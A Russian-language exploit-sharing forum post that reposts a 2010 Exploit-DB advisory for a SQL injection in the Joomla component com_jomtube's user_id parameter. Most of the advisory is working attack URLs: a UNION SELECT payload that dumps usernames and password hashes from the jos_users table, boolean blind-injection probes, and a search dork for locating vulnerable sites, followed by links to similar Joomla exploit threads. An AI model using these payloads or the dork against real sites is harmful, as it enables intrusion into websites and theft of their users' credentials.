Exploit Joomla! Component com_jomtube - 'user_id' Blind SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
14434
Проверка EDB
  1. Пройдено
Автор
SIXP4CK3R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2010-07-22
Код: 
===============================================================================
Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection
===============================================================================

Author          : SixP4ck3r
Email & msn     : SixP4ck3r@Bolivia.com
Date            : 17 July 2010
Critical Lvl    : High
Impact          : Exposure of sensitive information
Where           : From Remote
web		: http://foro.nbsecurity.net/
Credits		: Diablada and caporal is Bolivian!
Dork		: inurl:com_jomtube

---------------------------------------------------------------------------

[Sofware afected info]
Joomla Component (com_jomtube)
[Download]
http://www.jomtube.com/
[Afected versions]
All versions + 0 day

---------------------------------------------------------------------------

[Exploting..Bug..Demo..]
[insert valid user_id=n]

http://example/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9

,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+fr

om+jos_users--&option=com_jomtube

[Blind SQL Injection]
http://example/index.php?view=videos&type=member&user_id=62+and+1=1--&option=com_jomtube
http://example/index.php?view=videos&type=member&user_id=62+and+1=0--&option=com_jomtube
---------------------------------------------------------------------------

With R3gards,
SixP4ck3r from Bolivia
___eof____
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection
Ответы
0
Просмотры
999
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component AcySMS 3.5.0 - CSV Macro Injection
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Fields - SQLi Remote Code Execution (Metasploit)
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component ccNewsletter 2.x.x 'id' - SQL Injection
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Staff Master 1.0 RC 1 - SQL Injection
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Timetable Responsive Schedule For Joomla! 1.5 - 'alias' SQL Injection
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component NeoRecruit 4.1 - SQL Injection
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Project Log 1.5.3 - 'search' SQL Injection
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection
Ответы
0
Просмотры
1K
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection
Ответы
0
Просмотры
959
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу